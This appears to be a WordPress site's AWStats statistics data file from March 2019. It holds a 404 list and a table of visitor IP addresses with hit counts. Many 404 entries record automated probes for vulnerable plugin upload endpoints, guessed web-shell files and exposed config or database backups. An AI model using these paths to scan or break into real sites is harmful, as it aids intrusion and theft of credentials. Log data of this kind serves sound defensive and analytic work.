/wp-content/plugins/./simple-image-manipulator/controller/download.php 4 -
/wordpress.zip 1 -
/wp-content/themes/thegem/404.php 1 -
/WP/ 1 -
/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php 1 -
/533-2/ 3 -
/blog/wp-login.php 3 -
/apple-touch-icon-120x120-precomposed.png 2 -
/fe.php 1 -
/wp-content/themes/konzept/includes/uploadify/upload.php 1 -
/wp-upload-class.php 1 -
/security.php 1 -
/wp-config.old 1 -
/Mhbgf.php 5 http://site.ru
/%D0%BF%D1%80%D0%B8%D0%B3%D0%BB%D0%B0%D1%88%D0%B0%D0%B5%D0%BC-%D0%BD%D0%B0-%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D0%BA-%D0%BF%D0%B5%D1%80%D0%B2%D0%BE%D0%BA%D0%BB%D0%B0%D1%81%D1%81%D0%BD%D0%B8/ 1 -
/wp-content/plugins/css-ready-sel/r.php 1 http://site.ru
/%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B5%D0%B5-%D1%88%D0%BE%D1%83-%D1%81%D0%BD%D0%B5%D0%B6%D0%BD%D0%B0%D1%8F-%D0%BA%D0%BE%D1%80%D0%BE%D0%BB%D0%B5%D0%B2%D0%B0/ 4 -
/wp-content/uploads/2018/12/wp-console.php 1 http://site.ru
/site/wp-login.php 2 -
/wp-content/plugins/wp-db-ajax-made/wp-ajax.php 1 -
/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-white/designit/cs/uploadImage/$uploadfolder/jsspwned.php 1 -
/wp-content/plugins/webapp-builder/jsspwned.php 1 -
/wp-content/uploads/aul.php 1 http://site.ru
/wp-config.save 1 -
/wp-content/plugins/wpstorecart/php/upload.php 1 -
/wp-content/plugins/easy-wp-smtp/js/script.js 7 -
/JOMLA/ 1 -
/wp-xml.php.suspected 1 -
/cgi-bin.tar.gz 1 -
/wp-content/plugins/wp-themes/up.php 1 -
/installer-data.sql.tar.gz 1 -
/wp-content/plugins/html404/xccc.php 1 http://site.ru
/wp-content/plugins/viral-optins/api/uploader/file-uploader.php 1 -
/wp-content/uploads/user_uploads/test/jsspwned.php 2 -
/%D0%BA%D0%BE%D0%BC%D0%BF%D0%B5%D0%BD%D1%81%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F-%D0%B2%D1%8B%D0%BF%D0%BB%D0%B0%D1%82%D0%B0-%D0%B2%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD-%D0%B2%D1%8B%D0%B4%D0%B0/ 2 -
/site/ 5 -
/wp-content/uploads/2019/01/wp-console.php 1 http://site.ru
/wp-content/uploads/2018/10/wawa.php 2 http://site.ru
/wp-content/uploads/2018/02/idx.php 1 http://site.ru
/newsleter.php 6 -
/wp/wp-login.php 3 -
/blogs/ 1 -
/InCreate-FullPackage.tar.gz 2 -
/xn--fretagshem-ecb.tar.gz 1 -
/xn--g1akdbaehef3a2a5g.xn--p1ai.sql 1 -
/blog/robots.txt 1 -
/wp-content/uploader.php.suspected 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/uploader.php.suspected
/wp-content/plugins/wp-jobhunt/templates/elements/login/cs-social-login/media/js/cs-connect.js 1 -
/elfinder/php/connector.minimal.php 3 -
/wp-content/uploader.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/uploader.php
/wp-content/uploads/2019/01/blackhat.php 2 http://site.ru
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php 4 -
/quick_install_archive.tar.gz 1 -
/header-cache.php.suspected 1 -
/wp-cahce.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-cahce.php
/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php 1 -
/wp-content/uploads/2019/03/wawa.php 2 http://site.ru
/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/db.sql 2 -
/components/com_weblinks/weblinks.php 1 http://site.ru
/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php 1 -
/wp-content/uploads/2017/08/jBlFwyA157s.jpg 1 -
/portal/ 3 -
/cms/ 4 -
/%D0%B4%D0%B5%D1%82%D1%81%D0%BA%D0%B8%D0%B5-%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B8%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F/ 1 -
/wp-content/plugins/downloads-manager/upload/jsspwned.php 1 -
/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-includes/js/tinymce/query.js.php 1 -
/%D0%BC%D0%B0%D1%80%D1%82-%D1%8E%D0%B1%D0%B8%D0%BB%D1%8F%D1%80%D1%8B/ 1 -
/wp-content/uploads/2019/03/settings_auto.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 1023
80.245.252.228 889 3005 105021057 20190329103931
176.109.111.90 434 1190 51785828 20190304170452
80.245.248.234 64 245 3519537 20190328103109
37.115.190.120 54 54 2330767 20190309204201
46.118.120.6 51 51 2201747 20190311133315
46.119.114.171 51 51 2204202 20190310155359
46.118.156.122 43 43 1855848 20190309204347
37.115.187.192 35 35 1515191 20190329045513
61.160.247.137 32 32 5024 20190328035411
178.137.19.79 31 31 1348221 20190331031349
37.45.117.50 0 2 348202 
40.77.195.210 0 1 121200 
40.77.189.84 0 1 2637 
95.107.29.105 7 36 2041160 20190308200057
51.15.54.0 1 1 49522 20190308033204
5.188.210.65 6 7 332050 20190307002702
40.77.188.11 0 3 17810 
40.77.189.231 0 1 1685 
192.111.150.230 2 2 86892 20190301140350
95.24.20.249 2 20 318677 20190307131951
74.208.147.89 5 5 0 20190325021614
40.77.189.240 0 1 2234 
46.42.175.24 0 1 243591 
5.228.124.110 2 20 321303 20190330013523
40.77.190.15 0 1 1685 
40.77.188.198 0 1 2637 
217.15.202.102 4 30 1024154 20190325183606
178.141.37.245 0 1 233044 
5.3.191.225 1 20 227620 20190316152938
40.77.193.32 0 2 3637 
93.116.33.79 0 1 154204 
185.234.218.105 2 2 314 20190318012601
40.77.192.210 0 1 10056 
40.77.194.60 0 1 11004 
40.77.188.54 0 4 51052 
23.129.64.104 1 1 49631 20190316192107
217.15.194.59 4 25 588106 20190313181028
40.77.188.186 0 2 109217 
37.115.221.141 2 2 99044 20190308021129
40.77.253.182 0 1 37045 
213.87.156.78 0 1 210432 
78.37.41.189 0 2 197090 
40.77.190.118 0 1 14440 
85.91.194.216 0 1 137134 
40.77.190.102 1 6 187378 20190321155647
40.77.189.174 0 1 14440 
95.215.0.145 0 3 1573653 
40.77.189.127 0 5 60379 
40.77.188.161 0 1 11004 
185.100.87.206 1 1 439 20190301044205
192.99.35.149 7 7 153863 20190331153310
40.77.188.127 0 2 4007 
181.214.46.97 1 1 49522 20190307063756
31.173.83.47 2 23 355247 20190307165503
40.77.188.241 0 2 133231 
213.87.198.80 0 1 524551 
40.77.190.92 0 2 3176 
67.21.112.113 1 1 43446 20190303173821
128.68.208.106 2 20 316004 20190304053801
194.48.218.74 0 1 233044 
85.173.130.207 0 1 133373 
46.173.55.27 1 1 49536 20190314050350
109.184.193.143 3 3 146202 20190320081756
185.234.217.205 2 2 314 20190318210049
82.112.188.145 4 47 5362754 20190313091836
40.77.194.109 0 2 6802 
40.77.189.251 0 2 475379 
40.77.189.246 0 3 144238 
40.77.194.217 0 1 12034 
40.77.189.32 0 1 4568 
185.86.164.106 7 7 1099 20190330000639
40.77.252.209 0 1 1685 
40.77.188.248 0 1 2637 
181.215.51.176 1 1 49536 20190314103724
77.233.22.229 2 2 65665 20190329092642
5.23.96.44 15 80 2263385 20190328102501
40.77.195.101 0 1 121200 
46.48.125.212 9 45 4674806 20190321122345
185.135.150.254 14 91 6787696 20190324203833
34.247.32.9 1 1 49955 20190306124927
40.77.189.52 0 1 2234 
40.77.190.119 0 1 63365 
40.77.190.38 0 1 11004 
83.149.46.119 6 53 4904509 20190306103544
40.77.193.65 0 1 37045 
40.77.189.141 0 1 31000 
65.55.210.129 1 19 280186 20190321143349
37.208.120.83 0 1 524551 
92.62.112.147 4 4 198524 20190319015025
5.167.164.50 0 1 233044 
80.240.34.41 3 23 722847 20190318090924
40.77.195.183 0 1 1685 
212.47.239.148 1 1 49522 20190304184752
40.77.193.221 0 1 63365 
91.227.46.26 0 1 163840 
125.39.9.35 2 2 64893 20190301233330
40.77.188.94 0 1 63365 
40.77.190.91 0 2 94365 
80.89.153.246 0 1 233044 
94.230.125.198 0 1 233044 
176.14.37.74 1 1 49955 20190307015508
40.77.190.79 0 3 50852 
89.223.28.241 1 1 43446 20190301001912
40.77.193.209 0 1 11004 
178.122.32.26 0 1 133784 
40.77.193.84 0 1 12031 
46.188.32.25 0 1 146981 
109.184.223.46 1 1 48734 20190320071311
109.185.81.157 0 1 154204 
80.245.117.74 1 2 42496 20190320081435
40.77.189.221 0 1 2637 
40.77.188.109 0 1 10056 
40.77.193.137 0 1 444379 
40.77.188.183 0 1 1773 
148.243.237.135 3 3 0 20190324002008
40.77.189.90 0 1 1685 
40.77.193.166 1 18 276106 20190306230812
94.180.217.75 0 1 243591 
85.237.61.85 0 1 524551 
40.77.188.63 1 1 165548 20190328065226
40.77.193.142 0 1 31000 
40.77.252.138 0 2 456410 
94.102.9.16 1 1 157 20190316012622
188.32.136.113 2 21 514209 20190316015557
83.220.239.53 2 23 355397 20190320091958
40.77.193.130 0 2 12407 
40.77.192.164 0 1 10056 
40.77.188.207 0 3 77164 
158.69.249.121 3 3 93443 20190329055011
94.242.132.210 2 23 377475 20190320110424
40.77.189.213 0 2 33637 
40.77.189.175 0 1 37045 
178.62.11.248 5 5 0 20190326221014
94.180.224.26 0 1 524551 
40.77.190.112 0 1 1685 
82.162.55.190 0 1 154204 
40.77.195.2 0 1 25242 
37.212.95.66 0 2 91136 
40.77.188.17 0 1 4568 
95.108.133.207 0 1 233044 
95.211.209.158 1 1 48734 20190320042102
40.77.188.68 0 2 13437 
40.77.190.32 0 1 2637 
40.77.252.231 0 1 2637 
40.77.193.231 0 1 1773 
79.164.146.8 9 78 1347092 20190322192623
40.77.190.41 0 1 25658 
157.230.122.241 3 3 50833 20190318140212
178.137.167.214 27 27 1168866 20190326213247
109.186.249.212 6 81 10725261 20190329122717
134.209.223.70 1 1 168 20190317144625
193.201.224.220 24 24 3768 20190331215434
212.19.21.82 2 22 307274 20190313045454
185.85.238.244 6 6 942 20190319025945
40.77.190.124 0 1 1078 
40.77.194.132 0 2 23035 
31.13.115.14 0 1 19594 
40.77.192.53 0 3 15044 
171.25.193.78 2 2 99262 20190316200801
37.59.54.172 6 6 186886 20190330055935
46.188.52.231 2 20 315845 20190308171705
176.109.115.148 14 127 11511489 20190325215658
91.230.25.106 3 3 99433 20190330023911
40.77.253.91 0 2 45440 
40.77.190.110 0 1 121200 
66.102.9.20 17 167 5714987 20190321092402
40.77.190.99 1 3 168636 20190319171656
176.109.109.42 7 31 750245 20190301232756
40.77.194.79 1 2 176552 20190302175319
40.77.189.230 0 1 4568 
94.19.150.216 1 1 49522 20190310220109
40.77.189.87 0 1 1685 
85.128.142.97 3 3 0 20190323142914
46.39.45.255 0 1 524551 
40.77.194.122 0 1 10056 
128.204.52.254 0 1 187541 
40.77.188.90 0 3 98933 
40.77.194.232 0 2 13716 
40.77.195.75 0 1 12031 
40.77.189.195 0 1 2117 
40.77.193.105 0 1 11142 
40.77.189.151 0 2 27476 
141.98.81.181 3 3 120450 20190330075004
199.249.230.84 1 1 49631 20190316204546
40.77.188.231 0 1 11142 
37.72.84.243 0 1 196598 
40.77.192.21 0 1 121200 
40.77.194.189 1 1 165548 20190323131937
95.107.29.99 2 22 301021 20190317195341
172.241.170.4 1 1 48734 20190319151250
40.77.190.101 0 2 25582 
62.192.247.5 2 22 307424 20190319215729
185.86.164.101 11 11 1727 20190329105817
54.38.79.193 2 2 99072 20190314120516
95.221.57.88 0 1 192476 
31.13.115.3 0 2 1428 
40.77.190.117 0 2 65599 
5.188.210.32 1 1 169 20190311100318
40.77.190.129 0 4 7498 
40.77.195.27 0 2 3715 
213.87.139.72 3 23 453171 20190305235344
45.76.52.199 3 3 49860 20190304204610
95.28.230.119 0 1 112192 
176.98.69.217 7 7 291401 20190329033500
128.72.43.167 2 20 316320 20190301025939
5.3.158.39 2 20 316691 20190328034716
95.107.24.203 0 1 210432 
93.171.9.31 2 23 347206 20190301055914
23.129.64.105 1 1 49631 20190316234006
185.86.164.99 12 12 1884 20190329054451
94.25.162.100 2 23 342436 20190322150143
40.77.190.85 0 1 1773 
195.246.118.202 2 22 301446 20190328071402
82.146.50.213 3 3 116083 20190321175704
77.233.21.147 2 2 65665 20190327200438
158.69.241.223 1 1 49633 20190321002817
213.87.241.42 2 22 301446 20190323165312
40.77.194.116 0 1 37045 
176.36.21.189 1 1 5679 20190314114307
85.28.142.142 1 1 49737 20190322003417
40.77.193.18 0 1 11142 
40.77.188.53 0 2 42004 
37.204.37.15 2 20 317371 20190309184805
40.77.252.246 0 1 2637 
93.88.135.190 0 1 524551 
195.9.83.94 0 1 790856 
40.77.190.109 0 4 42364 
40.77.188.93 1 3 179355 20190322163152
31.13.115.9 0 4 87548 
40.77.188.220 0 2 29810 
40.77.188.206 0 3 114850 
40.77.189.142 0 1 4568 
193.106.30.98 2 2 99266 20190327234831
66.181.165.227 0 1 168046 
130.255.55.40 0 1 168046 
91.234.197.43 1 1 49633 20190328013113
40.77.189.45 0 1 2637 
46.42.173.22 2 20 323607 20190307131953
40.77.188.0 1 1 165548 20190309161919
194.113.106.11 2 2 49790 20190324143542
40.77.188.251 0 1 1403 
40.77.253.133 0 1 97183 
178.171.127.3 1 1 49633 20190328053103
31.173.86.70 1 20 223357 20190302123034
92.246.76.73 4 4 98681 20190323032500
40.77.189.173 0 1 1773 
94.242.58.14 1 1 43318 20190323185444
83.239.96.88 0 1 173012 
40.77.190.80 1 4 180730 20190331002544
13.57.233.99 8 8 387260 20190329124422
94.180.215.137 2 20 330139 20190308171650
213.151.1.87 0 1 176290 
40.77.189.224 0 1 12034 
77.233.9.52 2 2 65665 20190331180134
40.77.188.114 0 1 25242 
40.77.190.37 0 2 27015 
195.78.126.81 0 1 233044 
40.77.194.238 0 1 97183 
77.45.227.179 0 1 233044 
40.77.192.221 0 1 2117 
40.77.192.110 0 1 2117 
40.77.190.111 0 2 12407 
40.77.190.123 0 2 94365 
40.77.189.113 0 1 4568 
89.107.193.162 0 1 524551 
51.77.148.201 1 1 49633 20190320135433
40.77.188.233 0 2 98868 
5.189.166.59 2 2 0 20190322133828
40.77.195.20 0 2 456410 
40.77.193.59 1 10 222215 20190311153213
5.12.21.159 1 1 157 20190308085637
193.187.193.115 3 24 412024 20190307111243
128.68.35.251 1 21 379425 20190306052450
31.173.82.148 1 20 221726 20190312204106
192.42.116.16 1 1 439 20190302031825
40.77.190.131 0 2 94365 
178.124.151.229 0 1 133784 
40.77.188.22 0 1 37045 
40.77.190.49 0 3 160882 
195.9.70.50 3 24 375314 20190314151506
40.77.189.106 0 1 1773 
18.223.117.70 5 5 173912 20190302052331
40.77.188.243 0 1 11142 
40.77.189.1 0 2 4871 
188.32.52.72 0 1 462777 
185.85.239.110 10 10 1570 20190330200431
40.77.190.17 0 1 1685 
46.0.154.170 0 1 233044 
108.220.24.18 4 44 623166 20190308003244
91.210.199.60 0 1 233044 
41.78.26.155 1 1 49631 20190318005455
40.77.193.52 0 1 31000 
171.25.193.77 1 1 49631 20190317010357
40.77.193.138 0 1 12034 
40.77.189.98 0 1 62593 
40.77.192.130 0 5 13230 
40.77.188.171 0 2 56242 
104.155.98.113 3 3 0 20190323215650
78.37.27.185 2 22 307365 20190327095144
40.77.190.68 0 1 1773 
176.59.36.59 2 23 355222 20190315211657
40.77.189.15 0 1 31000 
94.130.131.80 1 1 49536 20190313071445
185.135.151.49 6 59 3894749 20190321181658
95.181.178.88 2 2 65297 20190318050623
93.62.205.66 2 2 92180 20190320004943
213.232.116.248 3 3 0 20190330102013
88.130.52.196 0 1 168046 
185.135.150.102 3 27 735256 20190315214231
37.204.17.67 2 20 322754 20190304093439
40.77.189.194 0 1 11004 
185.86.164.103 8 8 1256 20190331213301
145.255.3.36 3 23 329653 20190301114737
40.77.194.107 0 3 26985 
84.242.242.234 0 1 524551 
40.118.4.156 4 4 94488 20190328171136
40.77.189.23 0 1 63365 
40.77.194.118 0 1 1773 
40.77.190.113 0 1 12031 
40.77.253.177 1 1 165548 20190326221357
185.86.164.111 14 14 2198 20190330153151
193.169.254.91 2 2 314 20190306005422
178.215.105.17 2 22 301021 20190317115543
52.214.188.255 1 1 49955 20190306124851
40.77.189.51 0 1 14440 
180.163.220.68 5 35 638833 20190302003543
185.85.239.195 13 13 2041 20190330163845
193.201.224.225 8 8 1256 20190329024935
34.245.227.128 1 1 49969 20190314210101
69.12.72.164 1 1 157 20190327204740
212.46.18.115 0 1 233044 
40.77.188.38 0 2 13437 
62.210.83.206 2 2 99044 20190308014141
40.77.189.33 0 2 35568 
40.77.188.230 0 1 10938 
40.77.190.62 0 2 16674 
40.77.194.52 0 1 11142 
185.86.167.4 10 10 1570 20190328082953
142.4.208.21 1 1 157 20190322060324
40.77.190.84 0 3 7744 
31.173.86.182 1 20 224815 20190307003908
77.244.77.117 6 49 1511072 20190311131113
65.55.210.182 1 19 280132 20190306220954
94.180.234.151 2 20 330013 20190328151113
188.19.38.198 0 1 154204 
94.23.4.73 6 6 186886 20190327144120
92.38.244.157 0 1 790856 
40.77.193.248 0 1 97183 
40.77.189.82 0 1 4568 
50.63.15.171 3 3 0 20190324041730
52.53.201.78 13 13 638497 20190330092812
80.208.226.113 1 1 157 20190329085949
173.249.20.63 1 1 49633 20190320161624
2.50.57.204 1 1 49633 20190330072107
40.77.189.48 0 1 31000 
64.27.17.140 1 1 49631 20190316213107
178.171.95.23 1 1 49633 20190321093629
185.135.151.152 0 1 48128 
185.86.13.213 12 12 1884 20190326201826
40.77.253.35 0 1 2637 
40.77.193.237 0 1 10331 
51.68.89.239 2 2 99044 20190310052206
64.121.155.96 1 1 0 20190304084946
40.77.190.100 0 1 4568 
40.77.189.152 0 1 14440 
176.59.32.74 5 46 5508371 20190313135847
40.77.195.120 0 1 601 
95.72.67.108 1 1 49633 20190324122817
40.77.193.19 0 1 25242 
40.77.190.39 0 1 1773 
195.181.210.231 3 3 0 20190324013825
40.77.188.178 0 1 444379 
93.124.61.47 0 1 168046 
40.77.189.123 0 1 63365 
40.77.195.53 0 1 4568 
40.77.189.42 0 1 12034 
109.186.237.137 10 131 16283208 20190311104409
40.77.194.16 0 1 10056 
40.77.188.185 0 1 63365 
109.248.140.201 2 23 355196 20190320140328
40.77.252.20 0 1 12034 
40.77.193.110 0 1 2117 
91.211.143.170 0 2 590087 
93.80.36.247 2 20 321212 20190307131945
46.165.245.154 1 1 439 20190301141318
185.86.164.104 13 13 2041 20190326132716
40.77.253.71 0 1 1685 
40.77.189.66 0 1 12034 
5.188.210.44 2 2 83247 20190329194724
31.13.115.8 1 5 132240 20190321162312
40.77.188.36 0 1 1685 
40.77.195.236 0 1 12034 
192.99.15.139 16 16 533121 20190331144731
217.66.157.119 2 25 398956 20190314104914
5.143.182.60 14 55 2294940 20190301001258
77.93.117.175 0 1 154204 
40.77.188.99 0 1 2637 
40.77.190.96 0 3 106399 
92.62.67.144 0 1 45568 
188.234.228.57 0 1 155425 
40.77.188.6 0 1 10056 
213.87.163.227 4 25 3265296 20190305152823
77.238.233.73 0 1 125800 
40.77.192.253 0 2 26471 
194.147.32.106 1 1 43281 20190312095614
139.99.74.39 1 1 41176 20190313165311
40.77.190.58 0 2 13437 
46.188.42.169 0 2 317865 
40.77.193.255 0 1 121200 
40.77.189.74 1 7 405924 20190320014652
138.68.180.227 1 1 49631 20190318010031
178.137.80.158 17 17 735828 20190331060430
40.77.190.18 0 2 15710 
40.77.188.111 0 3 36527 
40.77.188.66 0 1 11004 
40.77.194.218 0 1 63365 
94.242.149.174 2 22 305907 20190304094833
109.184.160.228 1 1 49633 20190329044103
40.77.195.131 0 1 25242 
46.47.21.194 0 1 110592 
109.225.23.155 0 2 420864 
40.77.189.24 0 4 33887 
193.9.60.28 1 1 49633 20190326173249
40.77.193.4 0 1 10056 
185.119.81.50 9 9 1413 20190331035508
176.31.126.73 6 6 186590 20190309182039
31.13.115.12 1 11 114528 20190321162311
80.76.134.48 1 1 43961 20190304131702
40.77.192.215 0 1 37045 
40.77.194.239 0 1 2234 
46.42.133.7 2 20 323675 20190314010435
109.225.56.155 11 59 3617803 20190306003037
185.85.190.132 8 8 1256 20190331012751
40.77.192.197 0 1 10056 
40.77.190.34 0 1 25242 
178.215.97.52 2 21 289699 20190307174548
195.176.3.20 2 2 99262 20190316192111
40.77.193.157 0 1 1403 
40.77.252.29 0 1 63365 
40.77.195.212 0 1 121200 
178.216.222.194 0 1 133784 
185.234.217.209 2 2 314 20190325232436
77.233.21.224 4 4 131330 20190328204400
40.77.189.208 1 3 178093 20190327151032
40.77.189.47 0 1 12034 
31.173.82.146 1 13 113755 20190306021643
61.160.207.85 28 28 4396 20190324172519
185.19.20.233 0 2 588166 
167.99.80.173 5 5 0 20190327005202
40.77.189.179 0 1 1403 
40.77.193.103 0 1 37045 
40.77.188.209 0 1 1773 
110.54.236.163 1 1 49633 20190330151445
91.206.14.10 3 3 93216 20190315183404
213.87.132.98 5 55 2672020 20190309160132
40.77.189.215 0 1 31000 
93.120.143.226 1 1 49631 20190317002954
54.246.248.28 2 2 99961 20190328000246
185.86.164.102 6 6 942 20190329081258
40.77.189.58 0 2 16213 
83.220.239.113 0 1 83675 
40.77.189.4 0 1 31000 
40.77.189.244 0 1 63365 
54.207.110.177 1 1 49522 20190307083021
23.129.64.101 1 1 49631 20190316225702
83.149.46.153 2 24 529495 20190313130049
40.77.188.120 0 1 25242 
40.77.189.197 0 4 44092 
40.77.189.232 0 3 19311 
40.77.192.51 0 1 11004 
40.77.252.87 0 1 11004 
185.135.150.26 3 3 148677 20190331175137
91.231.196.159 1 1 49631 20190317065227
40.77.188.102 0 2 125768 
40.77.188.188 1 2 176690 20190307025700
40.77.193.81 0 1 12034 
40.77.188.8 0 1 11142 
40.77.188.219 0 3 17806 
185.86.93.48 1 1 43446 20190303132035
77.233.22.193 2 2 65665 20190327022201
46.105.92.10 5 5 0 20190325151028
46.233.203.215 2 20 317371 20190308171643
151.80.164.226 3 3 99435 20190317135739
188.255.7.78 0 1 790856 
83.149.47.199 2 27 741795 20190320172952
40.77.195.204 0 1 4568 
40.77.252.21 1 8 201209 20190318150105
40.77.188.157 1 1 165548 20190317041345
40.77.253.63 0 1 121200 
54.67.104.189 1 1 0 20190330053143
40.77.189.229 0 7 475094 
103.48.193.207 5 5 0 20190325055908
83.149.46.78 5 31 922423 20190328080922
40.77.192.113 0 1 1773 
40.77.188.177 0 3 15950 
37.44.112.24 2 22 301355 20190311091700
60.191.38.77 8 8 381413 20190327041519
40.77.188.48 0 1 2637 
37.204.75.254 2 20 321198 20190308171718
40.77.194.77 1 19 280186 20190314234128
185.234.218.100 2 2 314 20190319191031
40.77.188.129 0 5 21464 
40.77.189.145 0 1 444379 
40.77.188.193 0 3 466525 
176.210.166.159 0 1 233044 
192.99.13.15 6 6 186886 20190326121119
188.166.217.42 3 3 0 20190323162603
213.87.160.233 0 1 210432 
40.77.189.43 0 1 121200 
40.77.189.22 1 3 289385 20190326133553
46.105.101.95 1 1 41199 20190329085703
40.77.188.226 0 2 49079 
217.15.194.18 7 31 1100663 20190307165829
40.77.188.81 1 4 232089 20190328190820
46.42.134.204 1 22 550976 20190315104134
40.77.189.176 1 1 165548 20190312142621
37.200.224.179 2 2 65591 20190310064243
178.34.160.243 0 1 172378 
85.233.72.201 2 22 652769 20190329074014
40.77.188.112 0 1 11142 
31.173.84.110 1 20 222174 20190306195742
217.74.166.102 2 22 394003 20190313072815
40.77.189.204 0 2 4040 
79.121.192.206 5 5 0 20190324225634
216.145.5.42 2 2 93079 20190324085921
40.77.188.10 0 2 33117 
185.139.70.111 2 2 0 20190331023017
198.211.100.211 2 2 0 20190322075208
109.186.237.229 2 22 306421 20190302135917
40.77.188.134 0 1 11142 
31.132.158.110 4 45 5344369 20190312160711
176.215.128.10 0 1 524551 
40.77.190.95 0 1 25242 
195.112.99.199 9 64 2206183 20190331102757
167.114.172.224 3 3 148893 20190318043151
80.247.102.235 0 5 721422 
221.126.249.99 1 1 49669 20190320161905
165.227.214.174 1 1 157 20190321190628
40.77.189.155 0 2 25582 
89.151.178.98 0 1 233044 
64.188.21.87 1 1 49522 20190310205426
40.77.189.214 0 1 2637 
40.77.188.9 0 2 26645 
31.41.165.201 6 47 3811315 20190301233654
40.77.194.17 0 2 29810 
40.77.190.22 0 3 18850 
40.77.189.73 0 1 121200 
40.77.189.3 0 2 74369 
158.181.176.140 0 1 154204 
197.50.72.188 1 1 157 20190323193817
40.77.192.9 0 1 11004 
5.188.211.100 1 1 49522 20190308012904
40.77.188.245 1 3 288433 20190311153850
94.25.228.188 2 21 280079 20190319140229
62.33.80.67 0 1 524551 
93.185.30.134 2 22 307249 20190319144014
85.234.105.62 0 1 233044 
40.77.188.146 1 1 165548 20190324033825
128.72.28.133 2 20 319847 20190301013445
217.15.205.25 0 1 790856 
91.203.173.230 0 1 87729 
89.178.225.19 2 20 319843 20190328151117
66.249.82.151 0 1 168046 
40.77.252.217 0 1 63365 
40.77.189.9 0 2 122885 
40.77.189.205 0 1 121200 
94.25.160.79 2 23 390286 20190305213044
92.50.171.62 0 1 524551 
93.120.176.95 4 4 185936 20190309211739
54.167.161.76 1 1 163 20190320175810
37.204.75.202 0 2 736111 
40.77.188.32 0 1 12034 
40.77.188.135 0 4 46887 
176.116.64.31 0 1 133784 
37.204.54.218 0 1 524551 
40.77.188.141 0 1 25242 
40.77.193.98 1 1 165548 20190328084023
62.117.117.106 0 1 524551 
194.87.191.140 2 2 86636 20190327231841
109.248.149.44 1 1 49536 20190313094714
192.99.0.107 7 7 153863 20190329161356
40.77.189.133 0 1 4568 
40.77.188.58 0 1 31000 
40.77.193.225 0 1 12034 
40.77.190.2 1 2 177582 20190315153457
40.77.190.139 0 5 95749 
5.136.167.19 0 2 1049102 
40.77.188.155 0 1 1685 
40.77.193.239 0 1 31000 
40.77.188.253 0 1 11142 
40.77.189.243 0 2 21473 
78.85.116.59 3 22 348168 20190314180631
103.9.159.115 3 3 0 20190324121017
40.77.188.217 0 3 43407 
103.78.74.170 1 1 49631 20190315203306
176.59.194.25 0 1 233044 
37.145.56.99 0 1 31744 
40.77.190.60 0 1 4568 
213.87.156.145 2 22 485854 20190302091523
40.77.188.116 0 2 146442 
37.115.184.19 2 2 49790 20190331220008
40.77.194.67 0 1 2637 
147.44.178.165 2 22 402530 20190311123125
5.228.194.194 2 20 329848 20190307131939
40.77.195.249 0 2 132138 
145.255.3.138 0 1 233044 
109.70.100.24 1 1 49631 20190316165203
40.77.188.110 0 2 12689 
40.77.253.19 0 1 121200 
194.44.167.202 5 5 248183 20190323032227
46.105.101.178 6 6 186886 20190330073618
40.77.188.13 0 1 12034 
40.77.189.118 0 1 62593 
40.77.188.194 0 5 85836 
176.14.249.243 2 20 315319 20190330013521
213.33.245.35 9 35 1054977 20190331044617
40.77.189.26 0 4 62720 
40.77.188.236 0 3 136704 
213.33.147.90 7 50 1176234 20190326172200
40.77.193.36 0 1 4568 
37.146.154.148 2 27 646983 20190327152530
193.201.224.210 3 3 471 20190313085228
188.170.75.130 0 1 136374 
23.100.232.233 8 168 1267552 20190318024707
52.209.116.52 1 1 50036 20190304104013
128.199.114.0 3 3 0 20190324135633
40.77.193.216 0 1 14440 
176.108.5.204 2 2 86562 20190306225919
37.212.66.84 0 1 133784 
40.77.190.48 0 1 2637 
40.77.188.180 0 1 1773 
40.77.253.102 0 1 1685 
40.77.189.184 0 1 25242 
185.86.164.109 9 9 1413 20190331201650
46.166.112.147 0 1 233044 
40.77.190.10 0 1 2117 
95.28.225.171 2 20 321323 20190309205131
109.70.190.164 2 23 342654 20190305111006
40.77.189.154 0 4 151359 
40.77.192.54 0 1 12034 
138.197.162.4 4 4 342 20190321090951
40.77.188.98 0 1 4568 
51.15.92.212 1 1 49631 20190317014004
213.230.116.44 0 1 154204 
213.134.196.12 1 1 49631 20190318013654
40.77.189.12 0 2 43034 
93.179.69.110 1 1 32725 20190326173553
193.201.224.213 8 8 1256 20190323205245
213.79.117.189 2 23 700742 20190324184858
188.32.254.55 0 1 187541 
61.160.221.73 28 28 4396 20190324065418
87.249.212.26 2 22 301761 20190322073337
40.77.189.35 0 3 27678 
40.77.192.185 0 1 12034 
94.242.171.150 0 1 462777 
5.62.39.232 1 1 41162 20190311051938
40.77.188.242 1 2 166951 20190314140516
78.24.41.15 0 6 1245973 
40.77.252.81 0 2 445782 
151.55.34.96 2 25 624079 20190321183337
176.31.101.204 1 1 49633 20190325232008
82.149.200.182 0 1 125800 
89.163.242.241 1 1 49522 20190307071119
40.77.195.221 0 2 3176 
82.112.20.151 3 7 63488 20190326055344
40.77.192.71 0 1 97183 
40.77.188.87 0 1 1403 
40.77.189.80 1 1 165548 20190301101210
146.120.104.124 2 23 471615 20190305122754
40.77.189.226 0 1 1685 
40.77.189.96 0 2 12545 
40.77.189.166 0 3 67687 
40.77.189.89 0 2 13807 
